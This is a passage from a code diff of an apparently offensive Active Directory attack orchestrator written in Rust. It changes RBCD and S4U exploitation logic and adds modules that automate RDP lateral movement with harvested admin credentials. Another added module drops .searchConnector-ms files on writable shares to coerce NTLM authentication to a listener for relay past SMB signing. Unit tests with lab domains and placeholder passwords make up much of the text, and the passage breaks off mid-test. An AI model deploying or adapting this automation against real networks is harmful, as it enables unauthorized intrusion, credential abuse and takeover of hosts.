.push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation/rbcd.rs b/ares-cli/src/orchestrator/automation/rbcd.rs index b28228c6..5f487a75 100644 --- a/ares-cli/src/orchestrator/automation/rbcd.rs +++ b/ares-cli/src/orchestrator/automation/rbcd.rs @@ -14,6 +14,7 @@ use serde_json::json; use tokio::sync::watch; use tracing::{debug, info, warn}; +use crate::dedup::is_ghost_machine_account; use crate::orchestrator::dispatcher::Dispatcher; /// Dedup key prefix for RBCD attacks. @@ -91,6 +92,14 @@ pub async fn auto_rbcd_exploitation( .or_else(|| vuln.details.get("victim")) .and_then(|v| v.as_str()) .map(|s| s.to_string())?; + if is_ghost_machine_account(&target_computer) { + debug!( + vuln_id = %vuln.vuln_id, + target = %target_computer, + "RBCD skipped: ghost machine account target" + ); + return None; + } let domain = vuln .details @@ -99,28 +108,14 @@ - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - + // Find credential for the source user. Cross-forest ACL + // edges (e.g. leo@contoso → sql01$@fabrikam) put the + // source user in a different domain than the vuln's `domain` + // field (which is the target's domain), so we cannot + // domain-restrict against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; @@ -296,6 +291,11 @@ mod tests { assert!(!is_rbcd_candidate("shadow_credentials", Some("Computer"))); } + #[test] + fn ghost_machine_target_detected() { + assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$")); + } + #[test] fn resolve_computer_ip_exact_match() { let hosts = vec![ diff --git a/ares-cli/src/orchestrator/automation/rdp_lateral.rs b/ares-cli/src/orchestrator/automation/rdp_lateral.rs new file mode 100644 index 00000000..5c984dce --- /dev/null +++ b/ares-cli/src/orchestrator/automation/rdp_lateral.rs @@ -0,0 +1,716 @@ +//! auto_rdp_lateral -- RDP lateral movement to hosts with port 3389. +//! +//! Targets hosts with RDP service (port 3389) that are not yet owned. +//! Uses xfreerdp or similar tooling to authenticate and execute commands +//! via RDP, complementing WinRM lateral movement for hosts that only +//! expose RDP. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// RDP lateral movement to hosts with port 3389. +/// Interval: 45s. +pub async fn auto_rdp_lateral(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select!
{ + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("rdp_lateral") { + continue; + } + + let work: Vec<RdpWork> = { + let state = dispatcher.state.read().await; + collect_rdp_work(&state) + }; + + for item in work { + let payload = json!({ + "technique": "rdp_lateral", + "target_ip": item.host_ip, + "hostname": item.hostname, + "domain": item.domain, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("rdp_lateral"); + match dispatcher + .throttled_submit("lateral", "lateral", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host_ip, + hostname = %item.hostname, + "RDP lateral movement dispatched" + ); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_RDP_LATERAL, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_RDP_LATERAL, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.host_ip, "RDP lateral deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.host_ip, "Failed to dispatch RDP lateral"); + } + } + } + } +} + +/// Collect RDP lateral movement work items from current state. +/// +/// Extracted from the async loop for testability. +fn collect_rdp_work(state: &crate::orchestrator::state::StateInner) -> Vec<RdpWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for host in &state.hosts { + // Skip already-owned hosts + if host.owned { + continue; + } + + // Check for RDP service (port 3389) + let has_rdp = host.services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + if !has_rdp { + continue; + } + + let dedup_key = format!("rdp:{}", host.ip); + if state.is_processed(DEDUP_RDP_LATERAL, &dedup_key) { + continue; + } + + // Infer domain from hostname + let domain = host + .hostname + .find('.') + .map(|i| host.hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + + // Find admin credential for this domain + let cred = state + .credentials + .iter() + .find(|c| { + c.is_admin + && !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + .or_else(|| { + // Fall back to any credential with a password + state.credentials.iter().find(|c| { + !c.password.is_empty() + && (domain.is_empty() || c.domain.to_lowercase() == domain) + && !state.is_credential_quarantined(&c.username, &c.domain) + }) + }) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(RdpWork { + dedup_key, + host_ip: host.ip.clone(), + hostname: host.hostname.clone(), + domain, + credential: cred, + }); + } + + items +} + +struct RdpWork { + dedup_key: String, + host_ip: String, + hostname: String, + domain: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::SharedState; + use ares_core::models::{Credential, Host}; + + fn make_credential(username: &str, password: &str, domain: &str, is_admin: bool) -> Credential { + Credential { + id: format!("c-{}", username), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin, + discovered_at: None, + parent_id: None,
+ attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str, services: Vec<String>, owned: bool) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services, + is_dc: false, + owned, + } + } + + #[tokio::test] + async fn collect_empty_state_returns_no_work() { + let shared = SharedState::new("test-op".into()); + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_returns_no_work() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_host_with_rdp_and_admin_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.10"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].credential.username, "admin"); + assert!(work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_host_without_rdp_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["445/tcp microsoft-ds".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_owned_host_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + true, // already owned + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); // pragma: allowlist secret + s.mark_processed(DEDUP_RDP_LATERAL, "rdp:192.168.58.10".into()); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_falls_back_to_non_admin_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Only a non-admin
credential available + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "user1"); + assert!(!work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_prefers_admin_over_non_admin() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "user1", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + false, + )); + s.credentials.push(make_credential( + "admin", + "Adm1nP@ss!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert!(work[0].credential.is_admin); + } + + #[tokio::test] + async fn collect_no_cred_for_domain_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + // Credential for wrong domain + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_bare_hostname_matches_any_domain_cred() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + // Bare hostname (no domain suffix) → domain = "" → matches any cred + s.hosts.push(make_host( + "192.168.58.10", + "srv01", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[tokio::test] + async fn collect_multiple_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.11", + "srv02.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.12", + "web01.contoso.local", + vec!["80/tcp http".into()], // no RDP + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + let ips: Vec<&str> = work.iter().map(|w| w.host_ip.as_str()).collect(); + assert!(ips.contains(&"192.168.58.10")); + assert!(ips.contains(&"192.168.58.11")); + } + + #[tokio::test] + async fn collect_cred_with_empty_password_skipped() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "", "contoso.local", 
true)); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_rdp_detection_by_name() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["remote desktop rdp".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + } + + #[tokio::test] + async fn collect_dedup_key_format() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local", true)); + // pragma: allowlist secret + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work[0].dedup_key, "rdp:192.168.58.10"); + } + + #[tokio::test] + async fn collect_cross_domain_hosts() { + let shared = SharedState::new("test-op".into()); + { + let mut s = shared.write().await; + s.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.hosts.push(make_host( + "192.168.58.20", + "srv01.fabrikam.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + s.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + s.credentials.push(make_credential( + "fadmin", + "F@bPass1!", // pragma: allowlist secret + "fabrikam.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 2); + // contoso host uses contoso cred + let contoso_work = work.iter().find(|w| w.host_ip == "192.168.58.10").unwrap(); + assert_eq!(contoso_work.credential.domain, "contoso.local"); + // fabrikam host uses fabrikam cred + let fab_work = work.iter().find(|w| w.host_ip == "192.168.58.20").unwrap(); + assert_eq!(fab_work.credential.domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_rdp_work_via_shared_state() { + let shared = crate::orchestrator::state::SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state.hosts.push(make_host( + "192.168.58.10", + "srv01.contoso.local", + vec!["3389/tcp ms-wbt-server".into()], + false, + )); + state.credentials.push(make_credential( + "admin", + "P@ssw0rd!", // pragma: allowlist secret + "contoso.local", + true, + )); + } + let state = shared.read().await; + let work = collect_rdp_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host_ip, "192.168.58.10"); + } + + #[test] + fn dedup_key_format() { + let key = format!("rdp:{}", "192.168.58.22"); + assert_eq!(key, "rdp:192.168.58.22"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_RDP_LATERAL, "rdp_lateral"); + } + + #[test] + fn rdp_service_detection() { + let services = [ + "3389/tcp ms-wbt-server".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn no_rdp_service() { + let services = [ + "445/tcp microsoft-ds".to_string(), + "80/tcp http".to_string(), + ]; + let has_rdp = services.iter().any(|s| { 
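+ // Same detection predicate as collect_rdp_work: match the port number
+ // or an "rdp" substring in the advertised service name.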
+ let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } + + #[test] + fn domain_from_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "srv01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn rdp_service_detection_by_name() { + let services = ["remote desktop rdp".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_service_detection_case_insensitive() { + let services = ["3389/TCP MS-WBT-SERVER".to_string()]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(has_rdp); + } + + #[test] + fn rdp_payload_structure() { + let payload = serde_json::json!({ + "technique": "rdp_lateral", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "rdp_lateral"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn rdp_work_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: true, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + let work = RdpWork { + dedup_key: "rdp:192.168.58.22".into(), + host_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + credential: cred, + }; + assert_eq!(work.host_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert!(work.credential.is_admin); + } + + #[test] + fn admin_credential_preferred() { + // The module first looks for admin creds, then falls back to any with password + let is_admin = true; + let has_password = true; + let admin_match = is_admin && has_password; + assert!(admin_match); + } + + #[test] + fn empty_services_no_rdp() { + let services: Vec<String> = vec![]; + let has_rdp = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("3389") || sl.contains("rdp") + }); + assert!(!has_rdp); + } +} diff --git a/ares-cli/src/orchestrator/automation/s4u.rs b/ares-cli/src/orchestrator/automation/s4u.rs index 008d5e17..4d34453c 100644 --- a/ares-cli/src/orchestrator/automation/s4u.rs +++ b/ares-cli/src/orchestrator/automation/s4u.rs @@ -99,15 +99,23 @@ pub async fn auto_s4u_exploitation( // Don't increment failure count beyond what dispatch already counted. // The cooldown timer is already set from dispatch time. } - } else { - // Success or non-revocation error — reset failure count so - // subsequent dispatches aren't permanently blocked by the - // S4U_MAX_FAILURES threshold. + } else if should_reset_failure_count(result) { + // Only reset the failure count on actual success. + // Generic failures (wrong SPN, delegation edge is + // stale, service rejects S4U, etc.)
must keep their + // accumulated count so deterministic dead-ends + // eventually stop retrying. if let Some(vid) = task_vuln_map.remove(&tid) { if let Some(entry) = dispatch_tracker.get_mut(&vid) { entry.1 = 0; } } + } else { + // Non-lockout, non-success failure: preserve the + // existing failure count that was incremented on + // dispatch. Remove the task mapping so future result + // scans do not reprocess it. + task_vuln_map.remove(&tid); } } } @@ -362,6 +370,11 @@ fn has_lockout_error(result: &ares_core::models::TaskResult) -> bool { result_matches_patterns(result, LOCKOUT_PATTERNS) } +/// Only a successful S4U task should clear the accumulated failure count. +fn should_reset_failure_count(result: &ares_core::models::TaskResult) -> bool { + result.success +} + #[cfg(test)] mod tests { use super::*; @@ -562,4 +575,28 @@ mod tests { ); assert!(!has_lockout_error(&tr)); } + + #[test] + fn successful_task_resets_failure_count() { + let tr = TaskResult { + task_id: "t-ok".to_string(), + success: true, + result: Some(json!({"summary": "ticket obtained"})), + error: None, + completed_at: Utc::now(), + }; + assert!(should_reset_failure_count(&tr)); + } + + #[test] + fn generic_failure_does_not_reset_failure_count() { + let tr = TaskResult { + task_id: "t-fail".to_string(), + success: false, + result: Some(json!({"summary": "S4U failed: KRB_AP_ERR_MODIFIED"})), + error: None, + completed_at: Utc::now(), + }; + assert!(!should_reset_failure_count(&tr)); + } } diff --git a/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs new file mode 100644 index 00000000..53c7ce0a --- /dev/null +++ b/ares-cli/src/orchestrator/automation/searchconnector_coercion.rs @@ -0,0 +1,502 @@ +//! auto_searchconnector_coercion -- drop .searchConnector-ms files on writable shares. +//! +//! .searchConnector-ms XML files trigger WebDAV connections when a user browses +//! the share in Explorer. Unlike .lnk/.scf/.url (handled by auto_share_coercion), +//! searchConnector files force HTTP-based NTLM auth which bypasses SMB signing +//! requirements, enabling relay to LDAP/ADCS even when SMB signing is enforced. +//! +//! This module targets writable shares that auto_share_coercion has already +//! identified, deploying a complementary coercion technique. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SearchConnector coercion work items from current state. +/// +/// Pure logic extracted from `auto_searchconnector_coercion` so it can be +/// unit-tested without needing a `Dispatcher` or async runtime. 
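+///
+/// For orientation only: the rendered payload lives in the coercion worker,
+/// not in this module. A rough sketch of a `.searchConnector-ms` file, based
+/// on the publicly documented Windows Search Connector schema, with an
+/// illustrative listener address (the values below are assumptions, not
+/// taken from this codebase):
+///
+/// ```xml
+/// <?xml version="1.0" encoding="UTF-8"?>
+/// <searchConnectorDescription
+///     xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
+///   <description>Shared documents</description>
+///   <isSearchOnlyItem>false</isSearchOnlyItem>
+///   <simpleLocation>
+///     <!-- \\host@80\ routes through the WebClient (WebDAV) service,
+///          i.e. HTTP NTLM auth rather than SMB -->
+///     <url>\\192.168.58.50@80\coerce</url>
+///   </simpleLocation>
+/// </searchConnectorDescription>
+/// ```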
+fn collect_searchconnector_work(state: &StateInner, listener: &str) -> Vec<SearchConnectorWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let mut items = Vec::new(); + + for share in &state.shares { + if !share.permissions.to_uppercase().contains("WRITE") { + continue; + } + + let dedup_key = format!("searchconn:{}:{}", share.host, share.name); + if state.is_processed(DEDUP_SEARCHCONNECTOR, &dedup_key) { + continue; + } + + // Find credential for the share's host + let host_info = state.hosts.iter().find(|h| h.ip == share.host); + let domain = host_info + .and_then(|h| { + h.hostname + .find('.') + .map(|i| h.hostname[i + 1..].to_lowercase()) + }) + .unwrap_or_default(); + + let cred = state + .credentials + .iter() + .find(|c| !domain.is_empty() && c.domain.to_lowercase() == domain) + .or_else(|| state.credentials.first()) + .cloned(); + + let cred = match cred { + Some(c) => c, + None => continue, + }; + + items.push(SearchConnectorWork { + dedup_key, + share_host: share.host.clone(), + share_name: share.name.clone(), + listener: listener.to_string(), + credential: cred, + }); + } + + items +} + +/// Drops .searchConnector-ms coercion files on writable shares. +/// Interval: 45s. +pub async fn auto_searchconnector_coercion( + dispatcher: Arc<Dispatcher>, + mut shutdown: watch::Receiver<bool>, +) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("searchconnector_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, + }; + + let work: Vec<SearchConnectorWork> = { + let state = dispatcher.state.read().await; + collect_searchconnector_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "searchconnector_coercion", + "target_ip": item.share_host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("searchconnector_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.share_host, + share = %item.share_name, + "searchConnector-ms coercion file dispatched" + ); + + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_SEARCHCONNECTOR, item.dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_SEARCHCONNECTOR, &item.dedup_key) + .await; + } + Ok(None) => { + debug!(host = %item.share_host, "searchConnector coercion deferred"); + } + Err(e) => { + warn!(err = %e, host = %item.share_host, "Failed to dispatch searchConnector coercion"); + } + } + } + } +} + +struct SearchConnectorWork { + dedup_key: String, + share_host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Host, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist
secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + fn make_host(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.into(), + hostname: hostname.into(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("searchconn:{}:{}", "192.168.58.22", "Public"); + assert_eq!(key, "searchconn:192.168.58.22:Public"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_SEARCHCONNECTOR, "searchconnector"); + } + + #[test] + fn writable_share_detection() { + let write_perms = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &write_perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable" + ); + } + } + + #[test] + fn readonly_share_rejected() { + let perm = "READ"; + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_host_hostname() { + let hostname = "srv01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "searchconnector_coercion", + "target_ip": "192.168.58.22", + "share_name": "Public", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "searchconnector_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Public"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn writable_share_full_permission() { + let perm = "FULL"; + // FULL does not contain WRITE, so it should NOT be detected + assert!(!perm.to_uppercase().contains("WRITE")); + } + + #[test] + fn domain_from_fqdn_with_subdomain() { + let hostname = "web01.sub.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "sub.contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn dedup_key_special_characters_in_share_name() { + let key = format!("searchconn:{}:{}", "192.168.58.10", "Share With Spaces"); + assert_eq!(key, "searchconn:192.168.58.10:Share With Spaces"); + + let key2 = format!("searchconn:{}:{}", "192.168.58.10", "data$"); + assert_eq!(key2, "searchconn:192.168.58.10:data$"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: 
"c1".into(), + username: "svc_admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = SearchConnectorWork { + dedup_key: "searchconn:192.168.58.22:Public".into(), + share_host: "192.168.58.22".into(), + share_name: "Public".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work.share_host, "192.168.58.22"); + assert_eq!(work.share_name, "Public"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "svc_admin"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn case_insensitive_permission_matching() { + let perms = ["write", "Write", "WRITE", "read/Write", "Read/WRITE"]; + for p in &perms { + assert!( + p.to_uppercase().contains("WRITE"), + "{p} should be detected as writable regardless of case" + ); + } + } + + // --- collect_searchconnector_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_shares_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", 